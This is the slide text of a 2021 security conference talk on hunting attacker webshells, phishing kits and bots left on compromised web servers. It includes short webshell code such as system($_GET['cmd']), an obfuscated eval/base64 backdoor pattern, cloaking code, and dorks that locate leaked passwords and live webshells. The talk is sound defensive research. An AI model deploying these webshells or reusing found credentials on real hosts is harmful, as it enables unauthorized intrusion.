Cannibal Hacking, from zero the hero to hammer smashed host
Hack In Paris 2021
19 novembre 2021
Synacktiv
0xMitsurugi
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
Presentation
Security researcher @Synacktiv
Vulnerability research & exploitation
Disclaimer : this research is done on
personal time
0xMitsurugi
My company
https ://www.synacktiv.com
Offensive security company, based in France
We’re hiring !
reverse, pentest, DFIR, dev
interns !
just ask
3/71
Let start !
IDA <3
4/71
Let start !
IDA <3
5/71
About this talk
Warning
lack of asm, lack of 0-days
lack of legal base ¯\(°_o)/¯
Webshells, attackers, scans
HTTP is everywhere
Seen weird logs ? weird files ? webshells ? This is it !
Times flies…
It’s been a long long time
COVID, delays, and so on, parts of this document are more than 2 years old…
Oldies still goodies
6/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
The bad guys
How to don’t get caught when delivering malware
Don’t host it yourself
Use innocent victims
Hack them, and use those hosts !
Which malware ?
phishing
mirai/gafgyt/bots/malware
data hosting
defacing (less and less)
any other purpose
8/71
The bad guys
Yummy ! restaurant
9/71
The bad guys
Teach a man to phish…
10/71
The poor admins
Don’t blame the admins
Usually, no time to patch
Not always tech people
Security is hard (sad but true)
Password ‘password’ is a good idea, no ? … No ?
And time flies
Company disappears but website still up
Website forgotten (last blog update 2014)
11/71
But pirates are admin too !
Guess what
They are no better
weak passwords
same technics reused again and again
Lots of artefacts left
And bad infras
they hack poorly configured hosts ?
they are poorly secured too !
directory listing enabled…
host multi-infected…
12/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
Search all the things
Goooooooooogle…
14/71
Dork like a boss
Just search..
Good google
Google is good ? evil ?
Google hides results
Be better than google
15/71
Dork like a boss
853 only ??
16/71
Dork like a boss
Better
17/71
Dork like a boss
Words are blacklisted
Don’t search for “password leaks” or “email hacked”
Better
gmail.com e10adc3949ba59abbe56e057f20f883e ext:txt
Why ?
$ echo -n 123456 | md5sum
e10adc3949ba59abbe56e057f20f883e
$
18/71
Dork like a boss
Webshells
search for name of webshells
(yes it works..)
search for upload dirs
search for opendir
Use virustotal, urlscan and so on
Scrap google
use archive
go back in time when DNS are wiped :
curl --resolve infected.com:80:A.B.C.D https://infected.com
19/71
Dork like a boss
think like a bad guy
how would be name a webshell or command php file ?
x.php ? cmd.php ? zz.php ?
easy targets ? upload dirs ?
think like a phisher
do you remove your phish kit ?
is the name paypal.zip ? bank.zip ? netflix.zip ?
20/71
Dork like a boss
Juicy search
21/71
Dork like a boss
Webshell
22/71
Dork like a boss
File Manager
23/71
Dork like a boss
perlbot, yikes !
24/71
Dork like a boss
Another webshell
25/71
Dork like a boss
And another webshell
26/71
Dork like a boss
And, yaaawn, another webshell
27/71
Dork like a boss
Wanna passwords ?
28/71
Dork like a boss
Bad google
Google is clever and know those tricks
Prepare to get captcha-ed !
Bad searches
intitle:webshell
all of the so-called “best dork of 2020” you found
And honeypots
You won’t learn anything
29/71
Dork like a boss
Bim
30/71
Dork like a boss
Bim
31/71
Dork like a boss
Honeypot :(
32/71
Bounce like a boss
You get access !
Bad guys make mistakes, use them
Hosts are multi infected !
Reuse credzs
One more time for the merry-go round
Another webshell named “haxor webshell” ?
google intitle:haxor.webshell
Explore directories !
cheap hoster –> all hosts infected !
access.log –> find other webshell
33/71
Bounce like a boss
Starts with a phish
34/71
Bounce like a boss
Then a host
35/71
Bounce like a boss
Then a host
36/71
Bounce like a boss
With free webshell !!
37/71
Bounce like a boss
user@debian$ du -hs infected/
1.5G infected/
user@debian$
38/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
Analyze all the files
From old to new
oldest files are perl bots (yes.. perl)
then C99
then webshells
file managers
minimalist webshells : uploader/unzipper
password protection…
PHP for the win
yes, php is over-represented
some asp webshell, but it’s negligeable
40/71
Analyze all the files
Copy pasting
A lot of webshells
A gazillion of copies for each
Same with phish kits
Same with file managers
Passwords are usually bad
If you have one shot, try ‘cracking’
41/71
Making fun of mistakes
Yay ! Mistakes !
(...)
$PASS='4d1f35512954cb227b25bbd92e15bc7b'; //$PASS=cracking
(...)
$PASS=md5('cracking')
<label for=”Password”>Password:</label><H1>cracking</H1>
<input class=”password” type=”password” id=”Password” name=”Password”
/>
42/71
Making fun of mistakes
Yay ! Mistakes !
$PASS='4d1f35512954cb227b25bbd92e15bc7b';
$password = md5($_GET['pass']);
if (($password == $PASS) or (apache_request_headers()['L'] == 'L')) {
print(”Access granted”);
} else {
die();
}
Yes some hackers are bad…
uploads x.php, x.php.txt, x.jpg, x.gif, x.php7, x.php.html …
43/71
Making fun of mistakes
Yeah, bro put your mail here !
44/71
Backdooring the backdoor
Coding a webshell is hard, so..
Why don’t reuse this nice webshell found on a site with skulls and flame ?
Pirates are not nice to each others
webshells are backdoored !
sometime twice !
and someone backdoor is backdoored (!?)
45/71
Backdooring the backdoor
<?php
(lot of php stuff)
eval(gzuncompress(base64_decode('a long string .... ')));
(again a lot of php stuff)
?>
46/71
Attacker defense
Bad guys are lame in security ? Not at all..
.htaccess
antibots
passwords
fake 404
header checks
bouncers..
And annoying stuff
eval gzipped eval gzipped etc…
scrambling
php obfuscation
not efficient against motivated ones, but..
47/71
Attacker defense
/*------------------ Anti Crawler ------------*/
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
$userAgents = array(”Google”, ”Slurp”, ”MSNBot”, ”ia_archiver”, ”
Yandex”, ”Rambler”);
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['
HTTP_USER_AGENT']))
{
header('HTTP/1.0 404 Not Found');
exit;
}
}
echo ”<meta name=\”ROBOTS\” content=\”NOINDEX, NOFOLLOW\” />”; //For
Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/
48/71
Attacker defense
Some anti-something
49/71
Attacker defense
Crude language
50/71
Attacker defense
Much ASCII ART
51/71
Attacker defense
htaccess
sometime small, sometime big, sometime fun
A.B.C.D // leecher!
E.F.G.H // NSA or google
I.J.K.L // fuck you!
52/71
Attacker defense
more and more passwords…
the old days
<?php
system($_GET['cmd']);
?>
and now..
<?php
if isset($_GET['aef']) { system($_POST['vji']); }
?>
53/71
But, how they came in ? Can we know ?
No DFIR today..
Sometime easy to guess
unauth upload dir
old vulnerable stuff
Sometime impossible
ssh bruteforce ?
other host ?
other vector ?
54/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
Intermission 1
An innocent host with a view
Day 1, windows malware
Adding each day a malware for a week (low score on VT)
Day 10 phishing campaign (successfull)
Day 11 phishing campaign (total failure)
Day 11 to 15 : tons of new directories, half installed phish kits
Day 15 everything wiped
Day 15 webserver deactivated
56/71
Curious cases of phishing failures
Teach a man to phish..
zip kits are forgotten on servers
… kits are poorly configured
… and sometimes multi-trojanized
… with results left on servers (???)
and sometimes with no results at all…
WHO earns money with that ?
users of phishing kits ?
sellers of phishing kits ?
57/71
Curious cases of phishing failures
Bro, I have all yours victims
58/71
Curious cases of phishing failures
Brand new 2021 they said…
59/71
Curious cases of phishing failures
Prepare to get bored
intitle:index.of intext:paypal.zip
download, grep for fopen
results in real time if you’re quick enough
really disappointing
60/71
The boring case of Mirai/gafgyt and other bots
Mirai, gafgyt, and so on…
more boring than phish kits
always the same
follow the C&C for fun (?)
search for name, or client.c and server.c
61/71
Exceptionnaly
Once in while
new malware variant
strong code
Example of unknown source (troldesh maybe ?)
Cheap technic
High impact
Still unclear
webshell well hidden
good passwords
62/71
Analyze all the files
Technic
A full wordpress theme uploaded
PHP code embedded in a wordpress variable (or base64 png)
Custom extraction routine
Password MD5 used as a seed to decrypt php
Still working on it
63/71
Analyze all the files
First part is unsuspicious, but
64/71
Analyze all the files
something bad happens here
65/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
From Zero to Hero
Does warning admins works ?
Sometime, I send mail
I can count on one hand the answers
But evil files tend to disappear :)
Who are those attackers ?
cheap technics
cheap attackers
as long as it works, they’ll continue
67/71
Don’t get your host smashed
Patch, update, maintain
Terminate old servers,
Patch others,
Give strong passwords,
Audits,
yadda yadda…
$ grep -r 'exec(gzdecode' /var/www
68/71
Table of contents
1 Introduction
2 Web (in)-security
6 Lessons learned
3 Search all the things
7 Conclusion
4 Attacker arsenal
5 Real life example
Is there a turning point ?
Personal thought
Landscape is evolving
Less and less “personal” webservers
More and more facebook pages, no more personal blog
Or less and less PHP ?
pirates are better at hiding ?
or more and more exposure
trackers etc..
70/71
Final words ?
bad guys are here
phisher, wannabee hacker, kiddies, bots…
loosy php scripts
they are not always lame, we just find the lamest
google is (bad|good)
Finding bad guys is harder
warning
I’m not a lawyer, but : don’t do this at home, it may be highly illegal
use tor (at the cost at high captcha rates)
use kali in live mode in VM in a burner laptop
71/71
DO YOU HAVE
ANY QUESTIONS ?
THANK YOU FOR YOUR ATTENTION